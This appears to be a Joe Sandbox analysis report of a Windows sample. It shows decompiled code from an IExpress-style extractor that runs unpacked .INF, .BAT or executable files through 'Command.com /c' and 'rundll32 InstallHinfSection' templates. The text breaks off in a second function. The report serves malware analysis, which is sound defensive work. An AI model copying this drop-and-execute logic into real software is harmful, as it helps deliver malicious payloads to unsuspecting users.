                                                                                                                                                                                                                                              control_flow_graph 141 a81ae8-a81b2c call a81680 144 a81b3b-a81b40 141->144 145 a81b2e-a81b39 141->145 146 a81b46-a81b61 call a81a84 144->146 145->146 149 a81b9f-a81bc2 call a81781 call a8658a 146->149 150 a81b63-a81b65 146->150 159 a81bc7-a81bd3 call a866c8 149->159 151 a81b68-a81b6d 150->151 151->151 153 a81b6f-a81b74 151->153 153->149 155 a81b76-a81b7b 153->155 157 a81b7d-a81b81 155->157 158 a81b83-a81b86 155->158 157->158 161 a81b8c-a81b9d call a81680 157->161 158->149 162 a81b88-a81b8a 158->162 165 a81bd9-a81bf1 CompareStringA 159->165 166 a81d73-a81d7f call a866c8 159->166 161->159 162->149 162->161 165->166 168 a81bf7-a81c07 GetFileAttributesA 165->168 175 a81df8-a81e09 LocalAlloc 166->175 176 a81d81-a81d99 CompareStringA 166->176 170 a81c0d-a81c15 168->170 171 a81d53-a81d5e 168->171 170->171 174 a81c1b-a81c33 call a81a84 170->174 173 a81d64-a81d6e call a844b9 171->173 187 a81e94-a81ea4 call a86ce0 173->187 189 a81c50-a81c61 LocalAlloc 174->189 190 a81c35-a81c38 174->190 178 a81e0b-a81e1b GetFileAttributesA 175->178 179 a81dd4-a81ddf 175->179 176->175 181 a81d9b-a81da2 176->181 183 a81e1d-a81e1f 178->183 184 a81e67-a81e73 call a81680 178->184 179->173 186 a81da5-a81daa 181->186 183->184 188 a81e21-a81e3e call a81781 183->188 199 a81e78-a81e84 call a82aac 184->199 186->186 191 a81dac-a81db4 186->191 188->199 210 a81e40-a81e43 188->210 189->179 198 a81c67-a81c72 189->198 195 a81c3a 190->195 196 a81c40-a81c4b call a81a84 190->196 197 a81db7-a81dbc 191->197 195->196 196->189 197->197 203 a81dbe-a81dd2 LocalAlloc 197->203 204 a81c79-a81cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 a81c74 198->205 209 a81e89-a81e92 199->209 203->179 211 a81de1-a81df3 call a8171e 203->211 207 a81cf8-a81d07 204->207 208 a81cc2-a81ccc 204->208 205->204 215 a81d09-a81d21 GetShortPathNameA 207->215 216 a81d23 207->216 212 a81cce 208->212 213 a81cd3-a81cf3 call a81680 * 2 208->213 209->187 210->199 214 a81e45-a81e65 call a816b3 * 2 210->214 211->209 212->213 213->209 214->199 220 a81d28-a81d2b 215->220 216->220 224 a81d2d 220->224 225 a81d32-a81d4e call a8171e 220->225 224->225 225->209
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00A81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v527;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				char _v1552;
                                                                                                                                                                                                                                              				CHAR* _v1556;
                                                                                                                                                                                                                                              				int* _v1560;
                                                                                                                                                                                                                                              				CHAR** _v1564;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t48;
                                                                                                                                                                                                                                              				CHAR* _t53;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				char* _t57;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				CHAR* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				signed char _t65;
                                                                                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                              				unsigned int _t85;
                                                                                                                                                                                                                                              				CHAR* _t90;
                                                                                                                                                                                                                                              				CHAR* _t92;
                                                                                                                                                                                                                                              				char _t105;
                                                                                                                                                                                                                                              				char _t106;
                                                                                                                                                                                                                                              				CHAR** _t111;
                                                                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                                                              				CHAR* _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                                                                              				void* _t139;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				intOrPtr* _t146;
                                                                                                                                                                                                                                              				char* _t148;
                                                                                                                                                                                                                                              				CHAR* _t151;
                                                                                                                                                                                                                                              				void* _t152;
                                                                                                                                                                                                                                              				CHAR* _t155;
                                                                                                                                                                                                                                              				CHAR* _t156;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t48 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                              				_t108 = __ecx;
                                                                                                                                                                                                                                              				_v1564 = _a4;
                                                                                                                                                                                                                                              				_v1560 = _a8;
                                                                                                                                                                                                                                              				E00A81680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                              				if(_v528 != 0x22) {
                                                                                                                                                                                                                                              					_t135 = " ";
                                                                                                                                                                                                                                              					_t53 =  &_v528;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t135 = "\"";
                                                                                                                                                                                                                                              					_t53 =  &_v527;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t111 =  &_v1556;
                                                                                                                                                                                                                                              				_v1556 = _t53;
                                                                                                                                                                                                                                              				_t54 = E00A81A84(_t111, _t135);
                                                                                                                                                                                                                                              				_t156 = _v1556;
                                                                                                                                                                                                                                              				_t151 = _t54;
                                                                                                                                                                                                                                              				if(_t156 == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_push(_t111);
                                                                                                                                                                                                                                              					E00A81781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              					E00A8658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t132 = _t156;
                                                                                                                                                                                                                                              					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t105 =  *_t132;
                                                                                                                                                                                                                                              						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                              					} while (_t105 != 0);
                                                                                                                                                                                                                                              					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                              					if(_t111 < 3) {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t106 = _t156[1];
                                                                                                                                                                                                                                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                              						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L11;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						E00A81680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t138 = 0x2e;
                                                                                                                                                                                                                                              						_t57 = E00A866C8(_t156, _t138);
                                                                                                                                                                                                                                              						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                              							_t139 = 0x2e;
                                                                                                                                                                                                                                              							_t115 = _t156;
                                                                                                                                                                                                                                              							_t58 = E00A866C8(_t115, _t139);
                                                                                                                                                                                                                                              							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                              								if(_t156 == 0) {
                                                                                                                                                                                                                                              									goto L43;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                              								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              									E00A81680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_push(_t115);
                                                                                                                                                                                                                                              									_t108 = 0x400;
                                                                                                                                                                                                                                              									E00A81781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                              									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                              										E00A816B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                              										E00A816B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = _t156;
                                                                                                                                                                                                                                              								 *_t156 = 0;
                                                                                                                                                                                                                                              								E00A82AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                              								goto L53;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                              								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                              								_t145 = _t125 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t76 =  *_t125;
                                                                                                                                                                                                                                              									_t125 = _t125 + 1;
                                                                                                                                                                                                                                              								} while (_t76 != 0);
                                                                                                                                                                                                                                              								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                              								_t146 =  &_v268;
                                                                                                                                                                                                                                              								_t157 = _t146 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t77 =  *_t146;
                                                                                                                                                                                                                                              									_t146 = _t146 + 1;
                                                                                                                                                                                                                                              								} while (_t77 != 0);
                                                                                                                                                                                                                                              								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                              								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                              								if(_t156 != 0) {
                                                                                                                                                                                                                                              									E00A8171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L43;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t140 = 0x525;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t60 =  &_v268;
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t140 = "[";
                                                                                                                                                                                                                                              								_v1556 = _t151;
                                                                                                                                                                                                                                              								_t90 = E00A81A84( &_v1556, "[");
                                                                                                                                                                                                                                              								if(_t90 != 0) {
                                                                                                                                                                                                                                              									if( *_t90 != 0) {
                                                                                                                                                                                                                                              										_v1556 = _t90;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "]";
                                                                                                                                                                                                                                              									E00A81A84( &_v1556, "]");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                              								if(_t156 == 0) {
                                                                                                                                                                                                                                              									L43:
                                                                                                                                                                                                                                              									_t60 = 0;
                                                                                                                                                                                                                                              									_t140 = 0x4b5;
                                                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                                                              									_push(0x10);
                                                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                                                              									L35:
                                                                                                                                                                                                                                              									_push(_t60);
                                                                                                                                                                                                                                              									E00A844B9(0, _t140);
                                                                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                                                                              									goto L54;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t155 = _v1556;
                                                                                                                                                                                                                                              									_t92 = _t155;
                                                                                                                                                                                                                                              									if( *_t155 == 0) {
                                                                                                                                                                                                                                              										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									 *0xa89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                              									 *_v1560 = 1;
                                                                                                                                                                                                                                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa81140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                              										 *0xa89a34 =  *0xa89a34 & 0xfffffffb;
                                                                                                                                                                                                                                              										if( *0xa89a40 != 0) {
                                                                                                                                                                                                                                              											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t108 = "setupx.dll";
                                                                                                                                                                                                                                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_push( &_v268);
                                                                                                                                                                                                                                              										_push(_t155);
                                                                                                                                                                                                                                              										E00A8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										 *0xa89a34 =  *0xa89a34 | 0x00000004;
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										E00A81680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                              										_t140 = 0x200;
                                                                                                                                                                                                                                              										E00A81680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L53:
                                                                                                                                                                                                                                              									_t62 = 1;
                                                                                                                                                                                                                                              									 *_v1564 = _t156;
                                                                                                                                                                                                                                              									L54:
                                                                                                                                                                                                                                              									_pop(_t152);
                                                                                                                                                                                                                                              									return E00A86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}














































                                                                                                                                                                                                                                              0x00a81af3
                                                                                                                                                                                                                                              0x00a81afa
                                                                                                                                                                                                                                              0x00a81b07
                                                                                                                                                                                                                                              0x00a81b09
                                                                                                                                                                                                                                              0x00a81b1a
                                                                                                                                                                                                                                              0x00a81b20
                                                                                                                                                                                                                                              0x00a81b2c
                                                                                                                                                                                                                                              0x00a81b3b
                                                                                                                                                                                                                                              0x00a81b40
                                                                                                                                                                                                                                              0x00a81b2e
                                                                                                                                                                                                                                              0x00a81b2e
                                                                                                                                                                                                                                              0x00a81b33
                                                                                                                                                                                                                                              0x00a81b33
                                                                                                                                                                                                                                              0x00a81b46
                                                                                                                                                                                                                                              0x00a81b4c
                                                                                                                                                                                                                                              0x00a81b52
                                                                                                                                                                                                                                              0x00a81b57
                                                                                                                                                                                                                                              0x00a81b5d
                                                                                                                                                                                                                                              0x00a81b61
                                                                                                                                                                                                                                              0x00a81b9f
                                                                                                                                                                                                                                              0x00a81b9f
                                                                                                                                                                                                                                              0x00a81bb1
                                                                                                                                                                                                                                              0x00a81bc2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81b63
                                                                                                                                                                                                                                              0x00a81b63
                                                                                                                                                                                                                                              0x00a81b65
                                                                                                                                                                                                                                              0x00a81b68
                                                                                                                                                                                                                                              0x00a81b68
                                                                                                                                                                                                                                              0x00a81b6a
                                                                                                                                                                                                                                              0x00a81b6b
                                                                                                                                                                                                                                              0x00a81b6f
                                                                                                                                                                                                                                              0x00a81b74
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81b76
                                                                                                                                                                                                                                              0x00a81b7b
                                                                                                                                                                                                                                              0x00a81b86
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81b8c
                                                                                                                                                                                                                                              0x00a81b8c
                                                                                                                                                                                                                                              0x00a81b98
                                                                                                                                                                                                                                              0x00a81bc7
                                                                                                                                                                                                                                              0x00a81bc9
                                                                                                                                                                                                                                              0x00a81bcc
                                                                                                                                                                                                                                              0x00a81bd3
                                                                                                                                                                                                                                              0x00a81d75
                                                                                                                                                                                                                                              0x00a81d76
                                                                                                                                                                                                                                              0x00a81d78
                                                                                                                                                                                                                                              0x00a81d7f
                                                                                                                                                                                                                                              0x00a81e05
                                                                                                                                                                                                                                              0x00a81e09
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81e12
                                                                                                                                                                                                                                              0x00a81e1b
                                                                                                                                                                                                                                              0x00a81e73
                                                                                                                                                                                                                                              0x00a81e21
                                                                                                                                                                                                                                              0x00a81e21
                                                                                                                                                                                                                                              0x00a81e28
                                                                                                                                                                                                                                              0x00a81e37
                                                                                                                                                                                                                                              0x00a81e3e
                                                                                                                                                                                                                                              0x00a81e52
                                                                                                                                                                                                                                              0x00a81e60
                                                                                                                                                                                                                                              0x00a81e60
                                                                                                                                                                                                                                              0x00a81e3e
                                                                                                                                                                                                                                              0x00a81e79
                                                                                                                                                                                                                                              0x00a81e7b
                                                                                                                                                                                                                                              0x00a81e84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81d9b
                                                                                                                                                                                                                                              0x00a81d9b
                                                                                                                                                                                                                                              0x00a81da0
                                                                                                                                                                                                                                              0x00a81da2
                                                                                                                                                                                                                                              0x00a81da5
                                                                                                                                                                                                                                              0x00a81da5
                                                                                                                                                                                                                                              0x00a81da7
                                                                                                                                                                                                                                              0x00a81da8
                                                                                                                                                                                                                                              0x00a81dac
                                                                                                                                                                                                                                              0x00a81dae
                                                                                                                                                                                                                                              0x00a81db4
                                                                                                                                                                                                                                              0x00a81db7
                                                                                                                                                                                                                                              0x00a81db7
                                                                                                                                                                                                                                              0x00a81db9
                                                                                                                                                                                                                                              0x00a81dba
                                                                                                                                                                                                                                              0x00a81dbe
                                                                                                                                                                                                                                              0x00a81dc3
                                                                                                                                                                                                                                              0x00a81dce
                                                                                                                                                                                                                                              0x00a81dd2
                                                                                                                                                                                                                                              0x00a81deb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81df0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81dd2
                                                                                                                                                                                                                                              0x00a81bf7
                                                                                                                                                                                                                                              0x00a81bfe
                                                                                                                                                                                                                                              0x00a81c07
                                                                                                                                                                                                                                              0x00a81d55
                                                                                                                                                                                                                                              0x00a81d5a
                                                                                                                                                                                                                                              0x00a81d5b
                                                                                                                                                                                                                                              0x00a81d5d
                                                                                                                                                                                                                                              0x00a81d5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81c1b
                                                                                                                                                                                                                                              0x00a81c1b
                                                                                                                                                                                                                                              0x00a81c20
                                                                                                                                                                                                                                              0x00a81c2c
                                                                                                                                                                                                                                              0x00a81c33
                                                                                                                                                                                                                                              0x00a81c38
                                                                                                                                                                                                                                              0x00a81c3a
                                                                                                                                                                                                                                              0x00a81c3a
                                                                                                                                                                                                                                              0x00a81c40
                                                                                                                                                                                                                                              0x00a81c4b
                                                                                                                                                                                                                                              0x00a81c4b
                                                                                                                                                                                                                                              0x00a81c5d
                                                                                                                                                                                                                                              0x00a81c61
                                                                                                                                                                                                                                              0x00a81dd4
                                                                                                                                                                                                                                              0x00a81dd4
                                                                                                                                                                                                                                              0x00a81dd6
                                                                                                                                                                                                                                              0x00a81ddb
                                                                                                                                                                                                                                              0x00a81ddc
                                                                                                                                                                                                                                              0x00a81dde
                                                                                                                                                                                                                                              0x00a81d64
                                                                                                                                                                                                                                              0x00a81d64
                                                                                                                                                                                                                                              0x00a81d67
                                                                                                                                                                                                                                              0x00a81d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81c67
                                                                                                                                                                                                                                              0x00a81c67
                                                                                                                                                                                                                                              0x00a81c6d
                                                                                                                                                                                                                                              0x00a81c72
                                                                                                                                                                                                                                              0x00a81c74
                                                                                                                                                                                                                                              0x00a81c74
                                                                                                                                                                                                                                              0x00a81c8e
                                                                                                                                                                                                                                              0x00a81c99
                                                                                                                                                                                                                                              0x00a81cc0
                                                                                                                                                                                                                                              0x00a81cf8
                                                                                                                                                                                                                                              0x00a81d07
                                                                                                                                                                                                                                              0x00a81d23
                                                                                                                                                                                                                                              0x00a81d09
                                                                                                                                                                                                                                              0x00a81d14
                                                                                                                                                                                                                                              0x00a81d1b
                                                                                                                                                                                                                                              0x00a81d1b
                                                                                                                                                                                                                                              0x00a81d2b
                                                                                                                                                                                                                                              0x00a81d2d
                                                                                                                                                                                                                                              0x00a81d2d
                                                                                                                                                                                                                                              0x00a81d38
                                                                                                                                                                                                                                              0x00a81d39
                                                                                                                                                                                                                                              0x00a81d46
                                                                                                                                                                                                                                              0x00a81cc2
                                                                                                                                                                                                                                              0x00a81cc2
                                                                                                                                                                                                                                              0x00a81ccc
                                                                                                                                                                                                                                              0x00a81cce
                                                                                                                                                                                                                                              0x00a81cce
                                                                                                                                                                                                                                              0x00a81cdb
                                                                                                                                                                                                                                              0x00a81ce6
                                                                                                                                                                                                                                              0x00a81cee
                                                                                                                                                                                                                                              0x00a81cee
                                                                                                                                                                                                                                              0x00a81e89
                                                                                                                                                                                                                                              0x00a81e91
                                                                                                                                                                                                                                              0x00a81e92
                                                                                                                                                                                                                                              0x00a81e94
                                                                                                                                                                                                                                              0x00a81e97
                                                                                                                                                                                                                                              0x00a81ea4
                                                                                                                                                                                                                                              0x00a81ea4
                                                                                                                                                                                                                                              0x00a81c61
                                                                                                                                                                                                                                              0x00a81c07
                                                                                                                                                                                                                                              0x00a81bd3
                                                                                                                                                                                                                                              0x00a81b7b

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A81BE7
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A81BFE
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A81C57
                                                                                                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 00A81C88
                                                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A81140,00000000,00000008,?), ref: 00A81CB8
                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00A81D1B
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                              • API String ID: 383838535-852641736
                                                                                                                                                                                                                                              • Opcode ID: d57ea554f290d25c4a208fd2f45d5ffa662ebe41d0389d8c6256230b48a95d81
                                                                                                                                                                                                                                              • Instruction ID: 99764e5096b916e393c4c59946bc555086f21cb1b957b5b36f9303f3cb13e582
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d57ea554f290d25c4a208fd2f45d5ffa662ebe41d0389d8c6256230b48a95d81
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89A129B0A002146BEB20FB24CC49FFA776DEB55710F1447A9E595A32C1EBB49E87CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 406 a82f1d-a82f3d 407 a82f6c-a82f73 call a85164 406->407 408 a82f3f-a82f46 406->408 415 a82f79-a82f80 call a855a0 407->415 416 a83041 407->416 410 a82f48 call a851e5 408->410 411 a82f5f-a82f66 call a83a3f 408->411 417 a82f4d-a82f4f 410->417 411->407 411->416 415->416 424 a82f86-a82fbe GetSystemDirectoryA call a8658a LoadLibraryA 415->424 420 a83043-a83053 call a86ce0 416->420 417->416 421 a82f55-a82f5d 417->421 421->407 421->411 428 a82fc0-a82fd4 GetProcAddress 424->428 429 a82ff7-a83004 FreeLibrary 424->429 428->429 430 a82fd6-a82fee DecryptFileA 428->430 431 a83006-a8300c 429->431 432 a83017-a83024 SetCurrentDirectoryA 429->432 430->429 445 a82ff0-a82ff5 430->445 431->432 435 a8300e call a8621e 431->435 433 a83054-a8305a 432->433 434 a83026-a8303c call a844b9 call a86285 432->434 439 a8305c call a83b26 433->439 440 a83065-a8306c 433->440 434->416 441 a83013-a83015 435->441 451 a83061-a83063 439->451 442 a8307c-a83089 440->442 443 a8306e-a83075 call a8256d 440->443 441->416 441->432 448 a8308b-a83091 442->448 449 a830a1-a830a9 442->449 452 a8307a 443->452 445->429 448->449 453 a83093 call a83ba2 448->453 455 a830ab-a830ad 449->455 456 a830b4-a830b7 449->456 451->416 451->440 452->442 459 a83098-a8309a 453->459 455->456 458 a830af call a84169 455->458 456->420 458->456 459->416 461 a8309c 459->461 461->449
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00A82F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v272;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t47;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                                                                              				_t9 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                              				if( *0xa88a38 != 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					_t11 = E00A85164(_t52);
                                                                                                                                                                                                                                              					_t53 = _t11;
                                                                                                                                                                                                                                              					if(_t11 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						return E00A86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                              					}
